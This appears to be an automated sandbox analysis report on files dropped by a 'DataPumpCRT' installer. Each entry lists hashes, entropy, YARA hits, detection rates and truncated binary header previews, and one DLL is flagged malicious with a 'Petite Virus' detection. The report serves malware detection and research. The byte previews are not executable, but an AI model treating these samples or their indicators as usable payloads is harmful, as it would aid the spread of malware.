Preview:	MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...\|.

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PTF13.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	149845
Entropy (8bit):	7.893881970959476
Encrypted:	false
SSDEEP:	3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
MD5:	526E02E9EB8953655EB293D8BAC59C8F
SHA1:	7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
SHA-256:	E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
SHA-512:	053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PTF13.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QDL6V.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	294926
Entropy (8bit):	6.191604766067493
Encrypted:	false
SSDEEP:	3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
MD5:	C76C9AE552E4CE69E3EB9EC380BC0A42
SHA1:	EFFEC2973C3D678441AF76CFAA55E781271BD1FB
SHA-256:	574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
SHA-512:	7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........\|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QLQ4O.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5960
Entropy (8bit):	5.956401374574174
Encrypted:	false
SSDEEP:	96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
MD5:	B3CC560AC7A5D1D266CB54E9A5A4767E
SHA1:	E169E924405C2114022674256AFC28FE493FBFDF
SHA-256:	EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
SHA-512:	A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-RV73J.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	258560
Entropy (8bit):	6.491223412910377
Encrypted:	false
SSDEEP:	6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
MD5:	DB191B89F4D015B1B9AEE99AC78A7E65
SHA1:	8DAC370768E7480481300DD5EBF8BA9CE36E11E3
SHA-256:	38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
SHA-512:	A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TCA78.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36752
Entropy (8bit):	7.780431937344781
Encrypted:	false
SSDEEP:	768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
MD5:	9FF783BB73F8868FA6599CDE65ED21D7
SHA1:	F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
SHA-256:	E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
SHA-512:	C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x\|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p.....X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..\|....J

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TDBLU.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	5.1208137218866945
Encrypted:	false
SSDEEP:	24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
MD5:	B7EDCC6CB01ACE25EBD2555CF15473DC
SHA1:	2627FF03833F74ED51A7F43C55D30B249B6A0707
SHA-256:	D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
SHA-512:	962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
Malicious:	false
Reputation:	unknown
Preview:	Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TFV9B.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7910
Entropy (8bit):	6.931925007191986
Encrypted:	false
SSDEEP:	192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
MD5:	1268DEA570A7511FDC8E70C1149F6743
SHA1:	1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
SHA-256:	F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
SHA-512:	E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TFV9B.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................\|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TIUE0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	126478
Entropy (8bit):	6.268811819718352
Encrypted:	false
SSDEEP:	3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
MD5:	6E93C9C8AADA15890073E74ED8D400C9
SHA1:	94757DBD181346C7933694EA7D217B2B7977CC5F
SHA-256:	B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
SHA-512:	A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-V58DU.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19008
Entropy (8bit):	7.672481244971812
Encrypted:	false
SSDEEP:	384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
MD5:	8EE91149989D50DFCF9DAD00DF87C9B0
SHA1:	E5581E6C1334A78E493539F8EA1CE585C9FFAF89
SHA-256:	3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
SHA-512:	FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...\|...}K...................E..K....p..j...g........Q..........y...........

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-VFKEO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	13838
Entropy (8bit):	5.173769974589746
Encrypted:	false
SSDEEP:	192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
MD5:	9C55B3E5ED1365E82AE9D5DA3EAEC9F2
SHA1:	BB3D30805A84C6F0803BE549C070F21C735E10A9
SHA-256:	D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
SHA-512:	EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\lame_enc.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	967168
Entropy (8bit):	6.500850562754145
Encrypted:	false
SSDEEP:	12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
MD5:	C06D6F4DABD9E8BBDECFC5D61B43A8A9
SHA1:	16D9F4F035835AFE8F694AE5529F95E4C3C78526
SHA-256:	665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
SHA-512:	B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\lessmsi\is-GV12I.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	506871
Entropy (8bit):	7.998074018431883
Encrypted:	true
SSDEEP:	12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
MD5:	D52F8AE89AC65F755C28A95C274C1FFE
SHA1:	50D581469FF0648EE628A027396F39598995D8B0
SHA-256:	2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
SHA-512:	B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
Malicious:	false
Reputation:	unknown
Preview:	PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...."......US.R.SB....i.....T.R.......3./;/..Q.].{....:s=t.c....\|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx\|...}MA.n.].q:!]iB`....\|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O....P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........

C:\Program Files (x86)\DataPumpCRT\bin\x86\lessmsi\lessmsi-v1.6.91.zip (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	506871
Entropy (8bit):	7.998074018431883
Encrypted:	true
SSDEEP:	12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
MD5:	D52F8AE89AC65F755C28A95C274C1FFE
SHA1:	50D581469FF0648EE628A027396F39598995D8B0
SHA-256:	2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
SHA-512:	B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
Malicious:	false
Reputation:	unknown
Preview:	PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...."......US.R.SB....i.....T.R.......3./;/..Q.].{....:s=t.c....\|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx\|...}MA.n.].q:!]iB`....\|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O....P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........

C:\Program Files (x86)\DataPumpCRT\bin\x86\libFLAC_dynamic.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	512014
Entropy (8bit):	6.566561154468342
Encrypted:	false
SSDEEP:	12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
MD5:	C4A2068C59597175CD1A29F3E7F31BC1
SHA1:	89DE0169028E2BDD5F87A51E2251F7364981044D
SHA-256:	7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
SHA-512:	0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libdtsdec.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	126478
Entropy (8bit):	6.268811819718352
Encrypted:	false
SSDEEP:	3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
MD5:	6E93C9C8AADA15890073E74ED8D400C9
SHA1:	94757DBD181346C7933694EA7D217B2B7977CC5F
SHA-256:	B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
SHA-512:	A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libmp4v2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	845312
Entropy (8bit):	6.581151900686739
Encrypted:	false
SSDEEP:	24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
MD5:	00C672988C2B0A2CB818F4D382C1BE5D
SHA1:	57121C4852B36746146B10B5B97B5A76628F385F
SHA-256:	4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
SHA-512:	C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libsox-3.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	648384
Entropy (8bit):	6.666474522542094
Encrypted:	false
SSDEEP:	12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
MD5:	CE7DE939D74321A7D0E9BDF534B89AB9
SHA1:	56082B4E09A543562297E098A36AADC3338DEEC5
SHA-256:	A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
SHA-512:	03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libsoxr.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	227328
Entropy (8bit):	6.641153481093122
Encrypted:	false
SSDEEP:	6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
MD5:	BC824DC1D1417DE0A0E47A30A51428FD
